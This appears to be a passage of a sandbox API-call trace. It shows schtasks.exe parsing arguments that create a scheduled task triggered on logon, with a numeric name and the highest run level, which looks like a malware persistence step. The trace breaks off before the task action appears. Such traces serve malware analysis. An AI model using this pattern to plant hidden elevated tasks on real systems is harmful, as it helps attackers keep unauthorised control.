[0157.133] _vsnwprintf (in: _Buffer=0x4c5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|create|") returned 8 [0157.133] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|create|") returned 8 [0157.133] lstrlenW (lpString="|create|") returned 8 [0157.133] lstrlenW (lpString="|create|") returned 8 [0157.133] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0157.133] SetLastError (dwErrCode=0x0) [0157.133] SetLastError (dwErrCode=0x0) [0157.133] SetLastError (dwErrCode=0x0) [0157.133] lstrlenW (lpString="/sc") returned 3 [0157.134] lstrlenW (lpString="-/") returned 2 [0157.134] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.134] lstrlenW (lpString="?") returned 1 [0157.134] lstrlenW (lpString="?") returned 1 [0157.134] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.134] lstrlenW (lpString="sc") returned 2 [0157.134] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.134] _vsnwprintf (in: _Buffer=0x4c5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|?|") returned 3 [0157.134] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|sc|") returned 4 [0157.134] lstrlenW (lpString="|?|") returned 3 [0157.134] lstrlenW (lpString="|sc|") returned 4 [0157.134] SetLastError (dwErrCode=0x490) [0157.134] lstrlenW (lpString="create") returned 6 [0157.134] lstrlenW (lpString="create") returned 6 [0157.134] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.134] lstrlenW (lpString="sc") returned 2 [0157.134] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.134] _vsnwprintf (in: _Buffer=0x4c5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|create|") returned 8 [0157.134] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|sc|") returned 4 [0157.134] lstrlenW (lpString="|create|") returned 8 [0157.134] lstrlenW (lpString="|sc|") returned 4 [0157.134] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0157.134] SetLastError (dwErrCode=0x490) [0157.134] lstrlenW (lpString="delete") returned 6 [0157.134] lstrlenW (lpString="delete") returned 6 [0157.134] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.135] lstrlenW (lpString="sc") returned 2 [0157.135] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.135] _vsnwprintf (in: _Buffer=0x4c5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|delete|") returned 8 [0157.135] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|sc|") returned 4 [0157.135] lstrlenW (lpString="|delete|") returned 8 [0157.135] lstrlenW (lpString="|sc|") returned 4 [0157.135] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0157.135] SetLastError (dwErrCode=0x490) [0157.135] lstrlenW (lpString="query") returned 5 [0157.135] lstrlenW (lpString="query") returned 5 [0157.135] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.135] lstrlenW (lpString="sc") returned 2 [0157.135] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.135] _vsnwprintf (in: _Buffer=0x4c5348, _BufferCount=0x8, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|query|") returned 7 [0157.135] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|sc|") returned 4 [0157.135] lstrlenW (lpString="|query|") returned 7 [0157.135] lstrlenW (lpString="|sc|") returned 4 [0157.135] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0157.135] SetLastError (dwErrCode=0x490) [0157.135] lstrlenW (lpString="change") returned 6 [0157.135] lstrlenW (lpString="change") returned 6 [0157.135] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.135] lstrlenW (lpString="sc") returned 2 [0157.135] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.135] _vsnwprintf (in: _Buffer=0x4c5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|change|") returned 8 [0157.136] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|sc|") returned 4 [0157.136] lstrlenW (lpString="|change|") returned 8 [0157.136] lstrlenW (lpString="|sc|") returned 4 [0157.136] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0157.136] SetLastError (dwErrCode=0x490) [0157.136] lstrlenW (lpString="run") returned 3 [0157.136] lstrlenW (lpString="run") returned 3 [0157.136] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.136] lstrlenW (lpString="sc") returned 2 [0157.136] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.136] _vsnwprintf (in: _Buffer=0x4c5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|run|") returned 5 [0157.136] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|sc|") returned 4 [0157.136] lstrlenW (lpString="|run|") returned 5 [0157.136] lstrlenW (lpString="|sc|") returned 4 [0157.136] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0157.136] SetLastError (dwErrCode=0x490) [0157.136] lstrlenW (lpString="end") returned 3 [0157.136] lstrlenW (lpString="end") returned 3 [0157.136] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.136] lstrlenW (lpString="sc") returned 2 [0157.136] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.136] _vsnwprintf (in: _Buffer=0x4c5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|end|") returned 5 [0157.136] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|sc|") returned 4 [0157.136] lstrlenW (lpString="|end|") returned 5 [0157.136] lstrlenW (lpString="|sc|") returned 4 [0157.136] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0157.137] SetLastError (dwErrCode=0x490) [0157.137] lstrlenW (lpString="showsid") returned 7 [0157.137] lstrlenW (lpString="showsid") returned 7 [0157.137] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.137] GetProcessHeap () returned 0x4b0000 [0157.137] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5348) returned 1 [0157.137] GetProcessHeap () returned 0x4b0000 [0157.137] RtlReAllocateHeap (Heap=0x4b0000, Flags=0xc, Ptr=0x4c5348, Size=0x16) returned 0x4c5368 [0157.137] lstrlenW (lpString="sc") returned 2 [0157.137] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.137] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0xa, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|showsid|") returned 9 [0157.137] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|sc|") returned 4 [0157.137] lstrlenW (lpString="|showsid|") returned 9 [0157.137] lstrlenW (lpString="|sc|") returned 4 [0157.137] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0157.137] SetLastError (dwErrCode=0x490) [0157.137] SetLastError (dwErrCode=0x490) [0157.137] SetLastError (dwErrCode=0x0) [0157.137] lstrlenW (lpString="/sc") returned 3 [0157.137] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0157.137] SetLastError (dwErrCode=0x490) [0157.137] SetLastError (dwErrCode=0x0) [0157.137] lstrlenW (lpString="/sc") returned 3 [0157.137] GetProcessHeap () returned 0x4b0000 [0157.137] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x8) returned 0x4c6968 [0157.137] GetProcessHeap () returned 0x4b0000 [0157.137] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5348 [0157.137] SetLastError (dwErrCode=0x0) [0157.138] SetLastError (dwErrCode=0x0) [0157.138] lstrlenW (lpString="onlogon") returned 7 [0157.138] lstrlenW (lpString="-/") returned 2 [0157.138] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0157.138] SetLastError (dwErrCode=0x490) [0157.138] SetLastError (dwErrCode=0x490) [0157.138] SetLastError (dwErrCode=0x0) [0157.138] lstrlenW (lpString="onlogon") returned 7 [0157.138] StrChrIW (lpStart="onlogon", wMatch=0x3a) returned 0x0 [0157.138] SetLastError (dwErrCode=0x490) [0157.138] SetLastError (dwErrCode=0x0) [0157.138] lstrlenW (lpString="onlogon") returned 7 [0157.138] GetProcessHeap () returned 0x4b0000 [0157.138] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4cf8 [0157.138] GetProcessHeap () returned 0x4b0000 [0157.138] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5388 [0157.138] SetLastError (dwErrCode=0x0) [0157.138] SetLastError (dwErrCode=0x0) [0157.138] lstrlenW (lpString="/tn") returned 3 [0157.138] lstrlenW (lpString="-/") returned 2 [0157.138] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.138] lstrlenW (lpString="?") returned 1 [0157.138] lstrlenW (lpString="?") returned 1 [0157.138] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.138] lstrlenW (lpString="tn") returned 2 [0157.138] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.138] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|?|") returned 3 [0157.138] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tn|") returned 4 [0157.139] lstrlenW (lpString="|?|") returned 3 [0157.139] lstrlenW (lpString="|tn|") returned 4 [0157.139] SetLastError (dwErrCode=0x490) [0157.139] lstrlenW (lpString="create") returned 6 [0157.139] lstrlenW (lpString="create") returned 6 [0157.139] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.139] lstrlenW (lpString="tn") returned 2 [0157.139] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.139] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|create|") returned 8 [0157.139] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tn|") returned 4 [0157.139] lstrlenW (lpString="|create|") returned 8 [0157.139] lstrlenW (lpString="|tn|") returned 4 [0157.139] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0157.139] SetLastError (dwErrCode=0x490) [0157.139] lstrlenW (lpString="delete") returned 6 [0157.139] lstrlenW (lpString="delete") returned 6 [0157.139] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.139] lstrlenW (lpString="tn") returned 2 [0157.139] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.139] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|delete|") returned 8 [0157.139] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tn|") returned 4 [0157.139] lstrlenW (lpString="|delete|") returned 8 [0157.139] lstrlenW (lpString="|tn|") returned 4 [0157.139] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0157.139] SetLastError (dwErrCode=0x490) [0157.139] lstrlenW (lpString="query") returned 5 [0157.140] lstrlenW (lpString="query") returned 5 [0157.140] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.140] lstrlenW (lpString="tn") returned 2 [0157.140] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.140] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x8, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|query|") returned 7 [0157.140] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tn|") returned 4 [0157.140] lstrlenW (lpString="|query|") returned 7 [0157.140] lstrlenW (lpString="|tn|") returned 4 [0157.140] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0157.140] SetLastError (dwErrCode=0x490) [0157.140] lstrlenW (lpString="change") returned 6 [0157.140] lstrlenW (lpString="change") returned 6 [0157.140] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.140] lstrlenW (lpString="tn") returned 2 [0157.140] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.140] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|change|") returned 8 [0157.140] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tn|") returned 4 [0157.140] lstrlenW (lpString="|change|") returned 8 [0157.140] lstrlenW (lpString="|tn|") returned 4 [0157.140] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0157.140] SetLastError (dwErrCode=0x490) [0157.140] lstrlenW (lpString="run") returned 3 [0157.140] lstrlenW (lpString="run") returned 3 [0157.140] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.141] lstrlenW (lpString="tn") returned 2 [0157.141] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.141] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|run|") returned 5 [0157.141] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tn|") returned 4 [0157.141] lstrlenW (lpString="|run|") returned 5 [0157.141] lstrlenW (lpString="|tn|") returned 4 [0157.141] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0157.141] SetLastError (dwErrCode=0x490) [0157.141] lstrlenW (lpString="end") returned 3 [0157.141] lstrlenW (lpString="end") returned 3 [0157.141] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.141] lstrlenW (lpString="tn") returned 2 [0157.141] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.141] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|end|") returned 5 [0157.141] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tn|") returned 4 [0157.141] lstrlenW (lpString="|end|") returned 5 [0157.141] lstrlenW (lpString="|tn|") returned 4 [0157.141] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0157.141] SetLastError (dwErrCode=0x490) [0157.141] lstrlenW (lpString="showsid") returned 7 [0157.141] lstrlenW (lpString="showsid") returned 7 [0157.141] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.141] lstrlenW (lpString="tn") returned 2 [0157.141] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.141] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0xa, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|showsid|") returned 9 [0157.141] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tn|") returned 4 [0157.142] lstrlenW (lpString="|showsid|") returned 9 [0157.142] lstrlenW (lpString="|tn|") returned 4 [0157.142] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0157.142] SetLastError (dwErrCode=0x490) [0157.142] SetLastError (dwErrCode=0x490) [0157.142] SetLastError (dwErrCode=0x0) [0157.142] lstrlenW (lpString="/tn") returned 3 [0157.142] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0157.142] SetLastError (dwErrCode=0x490) [0157.142] SetLastError (dwErrCode=0x0) [0157.142] lstrlenW (lpString="/tn") returned 3 [0157.142] GetProcessHeap () returned 0x4b0000 [0157.142] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x8) returned 0x4c6978 [0157.142] GetProcessHeap () returned 0x4b0000 [0157.142] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c53a8 [0157.142] SetLastError (dwErrCode=0x0) [0157.142] SetLastError (dwErrCode=0x0) [0157.142] lstrlenW (lpString="2620738370") returned 10 [0157.142] lstrlenW (lpString="-/") returned 2 [0157.142] StrChrIW (lpStart="-/", wMatch=0x32) returned 0x0 [0157.142] SetLastError (dwErrCode=0x490) [0157.142] SetLastError (dwErrCode=0x490) [0157.142] SetLastError (dwErrCode=0x0) [0157.142] lstrlenW (lpString="2620738370") returned 10 [0157.142] StrChrIW (lpStart="2620738370", wMatch=0x3a) returned 0x0 [0157.142] SetLastError (dwErrCode=0x490) [0157.142] SetLastError (dwErrCode=0x0) [0157.142] lstrlenW (lpString="2620738370") returned 10 [0157.142] GetProcessHeap () returned 0x4b0000 [0157.142] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x16) returned 0x4c53c8 [0157.143] GetProcessHeap () returned 0x4b0000 [0157.143] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c53e8 [0157.143] SetLastError (dwErrCode=0x0) [0157.143] SetLastError (dwErrCode=0x0) [0157.143] lstrlenW (lpString="/rl") returned 3 [0157.143] lstrlenW (lpString="-/") returned 2 [0157.143] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.143] lstrlenW (lpString="?") returned 1 [0157.143] lstrlenW (lpString="?") returned 1 [0157.143] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.143] lstrlenW (lpString="rl") returned 2 [0157.143] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.143] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|?|") returned 3 [0157.143] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|rl|") returned 4 [0157.143] lstrlenW (lpString="|?|") returned 3 [0157.143] lstrlenW (lpString="|rl|") returned 4 [0157.143] SetLastError (dwErrCode=0x490) [0157.143] lstrlenW (lpString="create") returned 6 [0157.143] lstrlenW (lpString="create") returned 6 [0157.143] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.143] lstrlenW (lpString="rl") returned 2 [0157.143] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.143] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|create|") returned 8 [0157.143] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|rl|") returned 4 [0157.143] lstrlenW (lpString="|create|") returned 8 [0157.143] lstrlenW (lpString="|rl|") returned 4 [0157.144] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0157.144] SetLastError (dwErrCode=0x490) [0157.144] lstrlenW (lpString="delete") returned 6 [0157.144] lstrlenW (lpString="delete") returned 6 [0157.144] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.144] lstrlenW (lpString="rl") returned 2 [0157.144] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.144] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|delete|") returned 8 [0157.144] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|rl|") returned 4 [0157.144] lstrlenW (lpString="|delete|") returned 8 [0157.144] lstrlenW (lpString="|rl|") returned 4 [0157.144] StrStrIW (lpFirst="|delete|", lpSrch="|rl|") returned 0x0 [0157.144] SetLastError (dwErrCode=0x490) [0157.144] lstrlenW (lpString="query") returned 5 [0157.144] lstrlenW (lpString="query") returned 5 [0157.144] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.144] lstrlenW (lpString="rl") returned 2 [0157.144] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.144] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x8, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|query|") returned 7 [0157.144] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|rl|") returned 4 [0157.144] lstrlenW (lpString="|query|") returned 7 [0157.144] lstrlenW (lpString="|rl|") returned 4 [0157.144] StrStrIW (lpFirst="|query|", lpSrch="|rl|") returned 0x0 [0157.144] SetLastError (dwErrCode=0x490) [0157.144] lstrlenW (lpString="change") returned 6 [0157.145] lstrlenW (lpString="change") returned 6 [0157.145] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.145] lstrlenW (lpString="rl") returned 2 [0157.145] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.145] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|change|") returned 8 [0157.145] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|rl|") returned 4 [0157.145] lstrlenW (lpString="|change|") returned 8 [0157.145] lstrlenW (lpString="|rl|") returned 4 [0157.145] StrStrIW (lpFirst="|change|", lpSrch="|rl|") returned 0x0 [0157.145] SetLastError (dwErrCode=0x490) [0157.145] lstrlenW (lpString="run") returned 3 [0157.145] lstrlenW (lpString="run") returned 3 [0157.145] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.145] lstrlenW (lpString="rl") returned 2 [0157.145] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.145] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|run|") returned 5 [0157.145] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|rl|") returned 4 [0157.145] lstrlenW (lpString="|run|") returned 5 [0157.145] lstrlenW (lpString="|rl|") returned 4 [0157.145] StrStrIW (lpFirst="|run|", lpSrch="|rl|") returned 0x0 [0157.145] SetLastError (dwErrCode=0x490) [0157.145] lstrlenW (lpString="end") returned 3 [0157.145] lstrlenW (lpString="end") returned 3 [0157.145] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.145] lstrlenW (lpString="rl") returned 2 [0157.146] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.146] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|end|") returned 5 [0157.146] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|rl|") returned 4 [0157.146] lstrlenW (lpString="|end|") returned 5 [0157.146] lstrlenW (lpString="|rl|") returned 4 [0157.146] StrStrIW (lpFirst="|end|", lpSrch="|rl|") returned 0x0 [0157.146] SetLastError (dwErrCode=0x490) [0157.146] lstrlenW (lpString="showsid") returned 7 [0157.146] lstrlenW (lpString="showsid") returned 7 [0157.146] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.146] lstrlenW (lpString="rl") returned 2 [0157.146] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.146] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0xa, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|showsid|") returned 9 [0157.146] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|rl|") returned 4 [0157.146] lstrlenW (lpString="|showsid|") returned 9 [0157.146] lstrlenW (lpString="|rl|") returned 4 [0157.146] StrStrIW (lpFirst="|showsid|", lpSrch="|rl|") returned 0x0 [0157.146] SetLastError (dwErrCode=0x490) [0157.146] SetLastError (dwErrCode=0x490) [0157.146] SetLastError (dwErrCode=0x0) [0157.146] lstrlenW (lpString="/rl") returned 3 [0157.146] StrChrIW (lpStart="/rl", wMatch=0x3a) returned 0x0 [0157.146] SetLastError (dwErrCode=0x490) [0157.146] SetLastError (dwErrCode=0x0) [0157.146] lstrlenW (lpString="/rl") returned 3 [0157.147] GetProcessHeap () returned 0x4b0000 [0157.147] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x8) returned 0x4c6988 [0157.147] GetProcessHeap () returned 0x4b0000 [0157.147] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5408 [0157.147] SetLastError (dwErrCode=0x0) [0157.147] SetLastError (dwErrCode=0x0) [0157.147] lstrlenW (lpString="highest") returned 7 [0157.147] lstrlenW (lpString="-/") returned 2 [0157.147] StrChrIW (lpStart="-/", wMatch=0x68) returned 0x0 [0157.147] SetLastError (dwErrCode=0x490) [0157.147] SetLastError (dwErrCode=0x490) [0157.147] SetLastError (dwErrCode=0x0) [0157.147] lstrlenW (lpString="highest") returned 7 [0157.147] StrChrIW (lpStart="highest", wMatch=0x3a) returned 0x0 [0157.147] SetLastError (dwErrCode=0x490) [0157.147] SetLastError (dwErrCode=0x0) [0157.147] lstrlenW (lpString="highest") returned 7 [0157.147] GetProcessHeap () returned 0x4b0000 [0157.147] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4d28 [0157.147] GetProcessHeap () returned 0x4b0000 [0157.147] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5428 [0157.147] SetLastError (dwErrCode=0x0) [0157.147] SetLastError (dwErrCode=0x0) [0157.147] lstrlenW (lpString="/tr") returned 3 [0157.147] lstrlenW (lpString="-/") returned 2 [0157.147] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.147] lstrlenW (lpString="?") returned 1 [0157.147] lstrlenW (lpString="?") returned 1 [0157.148] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.148] lstrlenW (lpString="tr") returned 2 [0157.148] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.148] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|?|") returned 3 [0157.148] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|tr|") returned 4 [0157.148] lstrlenW (lpString="|?|") returned 3 [0157.148] lstrlenW (lpString="|tr|") returned 4 [0157.148] SetLastError (dwErrCode=0x490) [0157.148] lstrlenW (lpString="create") returned 6 [0157.148] lstrlenW (lpString="create") returned 6 [0157.148] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.148] lstrlenW (lpString="tr") returned 2 [0157.148] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.148] 